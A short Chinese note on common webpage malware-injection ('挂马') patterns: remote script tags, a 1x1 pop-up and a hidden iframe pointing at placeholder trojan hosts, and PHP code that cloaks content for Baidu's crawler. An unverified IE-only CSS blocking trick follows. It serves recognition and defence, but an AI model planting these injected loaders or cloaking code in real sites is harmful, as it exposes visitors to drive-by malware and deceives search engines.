网页被挂马常见状况

挂马样板，它们有多是下面这种的。

location.href
-----------------------------------------------------
<script src="http://www.XXX.com/XXXX.js"></script>
-----------------------------------------------------
window.open("http://www.123.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
-----------------------------------------------------

 document.write("<div style='display:none'>")
    document.write("<iframe src="网页木马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>")
    document.write("</div>")
-----------------------------------------------------
$file="http://www.XXXX.com/XXXX/X.htm";
$referer=$_SERVER["HTTP_REFERER"];//来路的网址url
$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);//当前请求的内容转化成小写
if(strstr($referer,"baidu")&&strstr($referer,"456"))//若是是从百度点到该页的
{
   Header("Location: $url");//转到原来的正常url
}
if(ereg("http://www.baidu.com/search/spider.htm",$agent))//若是是百度排虫
{
      $content=file_get_contents($file);//转到以前定义的那个url页面
        echo $content;
        exit;
}

-----------------------------------------------------

解决办法，未验证，先记录下来

-----------------------------------------------------
安全工程师提供了一段能够停止JS脚本运行的CSS代码，这段代码会让异地外域的JS文件在使用document.write()时，被document.close()强制关闭。这个时侯JS挂马的内容每每尚未来得及写完，只有部分被强制输出了，Writer后面的内容再不会被写入访问者的电脑中，从而起到防范JS脚本挂马的做用。
    让JS木马的进程迅速停止
    在 <head> </head> 之间加入以下代码:
    屏蔽script和iframe
    <style type="text/css" id="LinrStudio">
    /*<![CDATA[*/
    iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
    script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
    /*]]>*/
    </style>
    单屏蔽script
    <style type="text/css" id="LinrStudio">
    /*<![CDATA[*/
    /*iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}*/
    script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
    /*]]>*/
    </style>